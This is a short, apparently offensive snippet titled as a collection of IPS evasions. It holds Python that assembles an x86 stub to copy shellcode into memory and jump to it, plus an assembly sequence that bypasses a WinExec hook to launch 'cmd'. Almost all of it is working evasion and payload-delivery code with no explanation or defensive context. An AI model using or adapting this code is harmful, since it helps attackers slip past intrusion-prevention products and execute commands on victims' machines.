collection of various IPS evasions
offset = 0x1000 - len(scode) - 32

# tls_header: x86 stub assembled one instruction per list element;
# the mnemonic for each byte string is given in the trailing comment.
tls_header = "".join([
    "\xE8\x00\x00\x00\x00",                   # CALL $+5
    "\x5E",                                   # POP ESI
    "\x83\xC6\x1B",                           # ADD ESI, 0x1b
    "\xB9" + struct.pack("<L", len(scode)),   # MOV ECX, len(scode)
    "\x64\x8B\x3D\x30\x00\x00\x00",           # MOV EDI, DWORD PTR FS:[30]
    "\x81\xC7" + struct.pack("<L", offset),   # ADD EDI, offset
    "\x57",                                   # PUSH EDI
    "\xFC",                                   # CLD
    "\xF3\xA4",                               # REP MOVSB [EDI], [ESI]
    "\xC3",                                   # RETN
])

"""
another:
pop ebx ; Real return address
push 0x00220000 ; Address of push ebp/call ebp after a call.
push ebx ; Final return to the real return address
push 0xbadc0de2 ; Junk to align stack for pop ebp
push [ebp+0x4] ; Pointer to 'cmd\0'
push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER
push ebp ; WinExec preable
mov ebp, esp
sub esp, 0x54 ; end WinExec preable
jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6)
"""